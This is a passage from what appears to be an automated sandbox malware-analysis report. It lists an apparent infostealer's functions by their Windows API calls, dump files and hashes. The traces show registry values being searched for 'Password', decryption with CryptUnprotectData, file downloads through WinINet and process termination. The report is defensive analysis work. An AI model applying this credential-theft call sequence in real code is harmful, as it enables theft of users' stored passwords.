                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 6a39a6f2180a0c43ca365558c792be27340223fa5dbc2a02a4248eb4bd6ffab6
                                • Instruction ID: e7c37cf0c1dc85c9a8f09482acd7f91bf97938fadf6c6a04498291380b7655de
                                • Opcode Fuzzy Hash: 6a39a6f2180a0c43ca365558c792be27340223fa5dbc2a02a4248eb4bd6ffab6
                                • Instruction Fuzzy Hash: 5C510E75D10208AFDB20EFA4E989AAE77B9EF48314F105519FA05B3244DB35AD058BA0
                                Function 00E5DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,016CEC60), ref: 00E5E00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5E037
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E07D
                                • lstrcat.KERNEL32(?,?), ref: 00E5E098
                                • lstrcat.KERNEL32(?,?), ref: 00E5E0AC
                                • lstrcat.KERNEL32(?,016BA500), ref: 00E5E0C0
                                • lstrcat.KERNEL32(?,?), ref: 00E5E0D4
                                • lstrcat.KERNEL32(?,016CDF30), ref: 00E5E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E5E126
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 9c9869fdb643424e3beba52d2726b6c90adbaffb312956366718d756ec709125
                                • Instruction ID: 000df455b31cdfa8f3ea3725302ce066c82fe1f652410d84040816263cd45f20
                                • Opcode Fuzzy Hash: 9c9869fdb643424e3beba52d2726b6c90adbaffb312956366718d756ec709125
                                • Instruction Fuzzy Hash: 4A61AD71D1011CABCB25DB64D844ADDB3B8BF48310F5049A9BA49B3341DB74AF859F90
                                Function 00E46AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E46AFF
                                • InternetOpenA.WININET(00E6CFEC,00000001,00000000,00000000,00000000), ref: 00E46B2C
                                • StrCmpCA.SHLWAPI(?,016CF2C8), ref: 00E46B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00E46B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E46B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E46BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E46BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E46BF0
                                • CloseHandle.KERNEL32(00000000), ref: 00E46C10
                                • InternetCloseHandle.WININET(00000000), ref: 00E46C17
                                • InternetCloseHandle.WININET(?), ref: 00E46C21
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 2596b4a1b895150ec7b9a12092135fa8642c885aa6bf04d9cb26bd1aa2d25320
                                • Instruction ID: 56a3daf5b9d94d311853ccb289b94e12ea1898a6620f30d7a56bae91a6adbfcb
                                • Opcode Fuzzy Hash: 2596b4a1b895150ec7b9a12092135fa8642c885aa6bf04d9cb26bd1aa2d25320
                                • Instruction Fuzzy Hash: 2C41B471A50209ABDB24DF64EC49FAE77B8EF44704F008559FB45F7280DB74AD408BA5
                                Function 00E64500 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00E54F39), ref: 00E64545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E6454C
                                • wsprintfW.USER32 ref: 00E6455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00E645CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00E645D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 00E645E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: 9O$%hs$9O
                                • API String ID: 885711575-2037051700
                                • Opcode ID: 3f8409f22fc08737e8eef4530fdb13ea4546d0d96b10ae405c0c82ee7b87f156
                                • Instruction ID: fd8c21c61fd95b676262d5c4fc29da55549e1f5f30e515ef3fde5e8b6d1d10b2
                                • Opcode Fuzzy Hash: 3f8409f22fc08737e8eef4530fdb13ea4546d0d96b10ae405c0c82ee7b87f156
                                • Instruction Fuzzy Hash: 12319EB2E40208ABDB20DBA0EC49FDE7778AF44704F104059FA06F7184DB75AA418BA5
                                Function 00E4BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4BC1F
                                • lstrlen.KERNEL32(00000000), ref: 00E4BC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4BC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BCAC
                                • lstrlen.KERNEL32(00E74AD4), ref: 00E4BD23
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 2daf2140506f4ab8166e23639a5ab0e637d7abfebc90a256e6eef5fa3d4cd7ef
                                • Instruction ID: 0fdfe1fdd765b2fcfae0fcf19b4c2acde3aa4a5427c93491b5b9c93121f5d470
                                • Opcode Fuzzy Hash: 2daf2140506f4ab8166e23639a5ab0e637d7abfebc90a256e6eef5fa3d4cd7ef
                                • Instruction Fuzzy Hash: 47A15D30A012058FCB25DF68E989A6EB7F5AF44318F18A4ADE949FB351DB36DC41CB50
                                Function 00E65EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E65F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E65F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00E66014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 00E6609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E660D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: e5d0052a4bf607fb7252941c4587dff82a9097dcf50084c8dddd6a5833b8128a
                                • Instruction ID: 4c2272a396e6f0d61b6aeec2d01cbdc3f3e92859a416e50cfd3ac58b79afc5e4
                                • Opcode Fuzzy Hash: e5d0052a4bf607fb7252941c4587dff82a9097dcf50084c8dddd6a5833b8128a
                                • Instruction Fuzzy Hash: A361A171750604DBDB28CF5CE89496EB7B6EF84384B245A19E492E7381D731ED80CB94
                                Function 00E5E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E07D
                                • lstrcat.KERNEL32(?,?), ref: 00E5E098
                                • lstrcat.KERNEL32(?,?), ref: 00E5E0AC
                                • lstrcat.KERNEL32(?,016BA500), ref: 00E5E0C0
                                • lstrcat.KERNEL32(?,?), ref: 00E5E0D4
                                • lstrcat.KERNEL32(?,016CDF30), ref: 00E5E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E5E126
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: 4fc3ed7d428f2da144111812ca26bf361c1c872d4580a85cb4545a4fe64f3ef5
                                • Instruction ID: 355ba86033673ed9158c5fac567bb9241c72145fcff42c0510ea95989e045cee
                                • Opcode Fuzzy Hash: 4fc3ed7d428f2da144111812ca26bf361c1c872d4580a85cb4545a4fe64f3ef5
                                • Instruction Fuzzy Hash: C2418D71D101189BCB26EB64E848ADD73B4BF48314F5059A8FA4AB3345DB349F898FA0
                                Function 00E47A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E477D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E47805
                                  • Part of subcall function 00E477D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00E4784A
                                  • Part of subcall function 00E477D0: StrStrA.SHLWAPI(?,Password), ref: 00E478B8
                                  • Part of subcall function 00E477D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E478EC
                                  • Part of subcall function 00E477D0: HeapFree.KERNEL32(00000000), ref: 00E478F3
                                • lstrcat.KERNEL32(00000000,00E74AD4), ref: 00E47A90
                                • lstrcat.KERNEL32(00000000,?), ref: 00E47ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 00E47ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 00E47AF0
                                • wsprintfA.USER32 ref: 00E47B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E47B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E47B47
                                • lstrcat.KERNEL32(00000000,00E74AD4), ref: 00E47B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: 2bfa9da0c40883acec0a8216579ddb46e5b136b631447e47862483bf3f10aff2
                                • Instruction ID: 39cddd11edbb2db20bbb8a6a37f7af765e66a266b46d0a1e3753b584b2d6643e
                                • Opcode Fuzzy Hash: 2bfa9da0c40883acec0a8216579ddb46e5b136b631447e47862483bf3f10aff2
                                • Instruction Fuzzy Hash: F631F872E00214EFCB21DFA4E8489AFB7BAEB84314B145919F589B3244DB75ED00DBE0
                                Function 00E581B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00E5820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E58243
                                • lstrlen.KERNEL32(00000000), ref: 00E58260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E58297
                                • lstrlen.KERNEL32(00000000), ref: 00E582B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E582EB
                                • lstrlen.KERNEL32(00000000), ref: 00E58308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E58337
                                • lstrlen.KERNEL32(00000000), ref: 00E58351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E58380
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: ae7fe6d790b95226a7430ec762c8c78b68eaf2a5fc71fd72584901828314635c
                                • Instruction ID: 4936f7f5d3ce5947c43988ad65b2b9b2523e0ef13772888de2aab011d954c3bd
                                • Opcode Fuzzy Hash: ae7fe6d790b95226a7430ec762c8c78b68eaf2a5fc71fd72584901828314635c
                                • Instruction Fuzzy Hash: D751A0709006029BDB24DF28EA58A6AB7E4EF44711F019968FE46FB344DB30ED54CBE0
                                Function 00E477D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E47805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00E4784A
                                • StrStrA.SHLWAPI(?,Password), ref: 00E478B8
                                  • Part of subcall function 00E47750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E4775E
                                  • Part of subcall function 00E47750: RtlAllocateHeap.NTDLL(00000000), ref: 00E47765
                                  • Part of subcall function 00E47750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E4778D
                                  • Part of subcall function 00E47750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00E477AD
                                  • Part of subcall function 00E47750: LocalFree.KERNEL32(?), ref: 00E477B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E478EC
